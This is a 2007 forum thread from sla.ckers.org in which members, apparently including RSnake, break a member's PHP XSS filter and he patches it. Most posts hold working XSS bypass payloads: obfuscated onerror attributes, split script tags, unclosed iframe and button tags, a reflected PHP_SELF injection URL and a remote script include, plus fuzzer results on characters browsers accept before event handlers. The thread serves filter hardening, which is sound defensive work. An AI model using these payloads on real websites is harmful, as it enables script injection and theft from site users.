Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: Previous12
Current Page: 2 of 2
Re: XSS Filter
Posted by: rsnake
Date: January 23, 2007 03:42PM

Okay, but whew, I think I really am done testing this... Lots of other projects on the radar. Nice try though, SirNotAppearingOnThisForum!

<IMG src='asdf?&#x27;&#09`style='asd&\#09onerror=alert("XSS")&#09;`;//>

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: XSS Filter
Date: January 23, 2007 04:39PM

wow, thanks loads for helping :-)

it turns out I had not only not gotten the regex quite right (it was the third try or something too...), but had not taken into account the possibility of it interpreting part of an attribute value as a style attribute.

just a few questions before I reupload it, I tested this some browsers, but just to make sure am I right in figuring that only ", ', ` (ie. closed quotes) and whitespace can be in front of an attribute for it to be interpreted? and do you know what chars, exactly, are possible in an attribute name? (I'm guess alphanumeric, hyphen, underscore and colon, but not too sure)



Edited 1 time(s). Last edit at 01/23/2007 04:55PM by SirNotAppearingOnThisForum.

Options: ReplyQuote
Re: XSS Filter
Posted by: rsnake
Date: January 23, 2007 05:03PM

I decided not to do any guesswork and went straight to my fuzzer. Here are the decimal numbers of what can be put in immediately before an event handler in both IE and Firefox in the following syntax:

<IMG SRC="" [CHAR]onerror="alert('XSS')">

Internet Explorer:
0
9
10
11
12
13
32
47

Firefox
0
8
9
10
13
32

The only one that should be any surprise is 47 the forward slash. Other than that these are the usual suspects.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: XSS Filter
Date: January 23, 2007 05:38PM

ok, sweet. I can't thank you enough, rsnake.

I'll reupload it tomorrow; I think I've fixed it for everything you posted so far.

Options: ReplyQuote
Re: XSS Filter
Posted by: rsnake
Date: January 23, 2007 05:50PM

No worries, I aim to break. ;)

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: XSS Filter
Posted by: jungsonn
Date: January 23, 2007 08:15PM

Great stuff! I'm fuzzerless so to say ^^ I'm interested how far this will go.
One thing I know 4 sure, I'll wait when RSnake is done with it ;)

Options: ReplyQuote
Re: XSS Filter
Date: January 24, 2007 10:51AM

ok, updated it.

I decided it was best and less complicated to simply check every attribute in one regular expression, so a) style= won't be found in another attribute and b) we can escape all the quotes in each attribute. Also updated regex in style parser, and fixed it to see ` as a quote.

Options: ReplyQuote
Re: XSS Filter
Posted by: rsnake
Date: January 24, 2007 12:35PM

This one took a little work...

<IMG src="http://ha.ckers.org/" style"="style`=a&#13;/onerror=alert(String.fromCharCode(88,83,83))// >

It turns into:

<IMG src="http://ha.ckers.org/" style"="style="a
/onerror=alert(String.fromCharCode(88,83,83))//" &gt;`>

The style definitions are super important (the order of them and where the quotes go). You absolutely must do it in that order to get IE to ignore the second style definition. Painful but it works. And yes, I realize that it's still technically encapsulated in quotes, welcome to the wonderful world of rendering engines. Unfortunately logic goes right out the window. This is actually a perfect example of why when people tell me they know HTML I sorta laugh. They may be able to make a web-page, but next to no one knows this level of HTML obfuscation.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: XSS Filter
Date: January 24, 2007 02:50PM

Wow, that's some pretty wacked out html...

Alright this time, I went ahead and not only checked every attribute, but I decided to only allow the checked attributes through as tag attributes (ie. recreate the tag). Also removed some functions which got sort of redundant after the new attribute verification method.

It's sort of funny; I started this trying to be as minimal and passive as possible (remove the bad instead of allow the good, if you get what I mean), and it managed to morph into a rather aggressive filter.

Thanks so much for your help again rsnake, I would never have figured those work-arounds out myself.

EDIT: spelling



Edited 1 time(s). Last edit at 01/24/2007 03:14PM by SirNotAppearingOnThisForum.

Options: ReplyQuote
Re: XSS Filter
Posted by: jungsonn
Date: January 24, 2007 03:02PM

Does this works in your new version?

<img src="google.com/logo.gif" \0onload=document.getElementById('div').innerHTML='haxored!'; />

Options: ReplyQuote
Re: XSS Filter
Date: January 24, 2007 03:12PM

well you can test it yourself, but no, it dosn't work. the \0 isn't evaluated, so it dosn't catch the second attribute, consequently excluding it from the 'rebuilt' tag.

Options: ReplyQuote
Re: XSS Filter
Posted by: jungsonn
Date: January 24, 2007 04:08PM

<a href="hello@hello.com" ONclick)=alert('sss'); >hello@hello.com</a>

Last one, this does work at my version.
damn, this really becomes a good sport ^^

And yet also a learning curve,
because I did not know that such thing was allowed in JavaScript:

onclick)=function();



Edited 2 time(s). Last edit at 01/24/2007 04:18PM by jungsonn.

Options: ReplyQuote
Re: XSS Filter
Date: January 24, 2007 04:29PM

>Last one, this does work at my version.
version of what? it dosn't work with the latest update of the filter, if that's what you're refering to. if not, then, nevermind...

Options: ReplyQuote
Re: XSS Filter
Posted by: jungsonn
Date: January 24, 2007 04:37PM

Yes it was the previous one, I just tryed your newest now;

And this one get's passed:

<marquee direction=right width=200 height=200; onmouseover=alert('aaa'); </ Yo mouseover me......


Rather funny I thought :)

Options: ReplyQuote
Re: XSS Filter
Date: January 24, 2007 04:41PM

ah yeah, so it does. I knew removing that function would have consequences (it would have added an ending >). fixed, though.



Edited 1 time(s). Last edit at 01/24/2007 04:42PM by SirNotAppearingOnThisForum.

Options: ReplyQuote
Re: XSS Filter
Posted by: jungsonn
Date: January 24, 2007 04:42PM

Ok this one also:

<button onclick=alert('aaa'); </ Yo click me......

Seems that it doesn't needs to be closed of for FF, ghehe..

Options: ReplyQuote
Re: XSS Filter
Posted by: WhiteAcid
Date: January 24, 2007 04:46PM

I know this isn't a flaw in the filter but here you go: http://sirnot.110mb.com/htmlformatter.php/%22%3E%3Cscript%3Ealert(1)%3C/script%3E

Not many know how to abuse $SERVER['PHP_SELF']. It doesn't always work though, and I haven't yet figured out what causes it to work on some servers and not on others.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: XSS Filter
Date: January 24, 2007 04:49PM

yeah, that would be because that script is a simple demo wrapper around the filter which I threw together so it could be easily tested. personally I don't really care if the script itself can be exploited; I have nothing on that server besides the filter and a few random html pages, anyhow.

EDIT: I'm afraid I have to leave for ~10 days tomorrow, so don't expect to hear from me for a little while. Thanks a ton for you help, everyone, I really appriciate it :-)



Edited 2 time(s). Last edit at 01/24/2007 05:01PM by SirNotAppearingOnThisForum.

Options: ReplyQuote
Re: XSS Filter
Posted by: jungsonn
Date: January 24, 2007 05:11PM

Yes, isn't this solvable by using htmlspecialchars() WhiteAcid? mainly if it is in a form it will do that.

Options: ReplyQuote
Re: XSS Filter
Posted by: rsnake
Date: January 24, 2007 07:19PM

Another issue:

<a href="hello@hello.com" a=`"a'style="a; style='<script'></a><script src=http://ha.ckers.org/xss.js?


Turns into:

<a href="http://hello@hello.com" a="&#96;&quot;a&#39;style=&quot;a;" style="&#39;</a" ><script src="http://ha.ckers.org/xss.js?" ></script></a>

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: XSS Filter
Posted by: eyeced
Date: January 25, 2007 07:15AM

I got one, no obfuscation at all. Still works at time of this post.

Trying the obbvious <iframe src="http://ha.ckers.org/scriptlet.html"></iframe> gets stripped completely, but without ended the iframe the filter does it for you.

<iframe src="http://ha.ckers.org/scriptlet.html" <

gets returned as

<iframe src="http://ha.ckers.org/scriptlet.html" ></iframe>

which still works (in all browsers).

Options: ReplyQuote
Re: XSS Filter
Posted by: pOkE
Date: January 25, 2007 07:55AM

Also,

<s<script>cript>alert('xss');</s</script>cript>

becomes

<script >alert('xss');</script>

unless I'm doing somehthing wrong.

Options: ReplyQuote
Re: XSS Filter
Posted by: jungsonn
Date: January 25, 2007 07:58AM

I have a feeling that with a bunch of fixes, some old vectors or combo's of it return. I guess he has to test all vectors again when done fixing. A thing that's usually forgotten in beta-testing. like: ok fixed, but 5 fixes later, the first or second hole returns. Anyway, that's what beta-testing is I guess.

Options: ReplyQuote
Re: XSS Filter
Posted by: rsnake
Date: January 25, 2007 10:33AM

Hahah, you guys are going after all the easy stuff... And yes, I tested both of your vectors and they work exactly as you said they would in the most current version. I just totally skipped over the easy stuff figuring that was already fixed and went right to the very difficult vectors. Nice work eyeced and pOkE! Hahah! Awesome.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: XSS Filter
Posted by: tx
Date: January 25, 2007 06:31PM

p0kE: you can actually shorten that vector to:
alert('xss');</scrip<script>t>
no sense in typing more than you have to ;)

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: XSS Filter
Posted by: rsnake
Date: January 25, 2007 09:04PM

As long as we are shortening his vector, why not reduce a few more chars:

alert('xss')</script<script>

;) Diminutive XSS is fun!

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: XSS Filter
Date: February 04, 2007 10:17AM

Ok, sorry about that guys. Couldn't really do a whole lot for a tiny bit, but I'm back now :-)

Anyhow, that seemed to be yet another consequence of removing functions... :-/ In retrospect I don't know what I was doing with that general preg_replace call; that was really stupid of me. Moved the node name check to the callback function, so it should be fixed now.

Options: ReplyQuote
Pages: Previous12
Current Page: 2 of 2


Sorry, only registered users may post in this forum.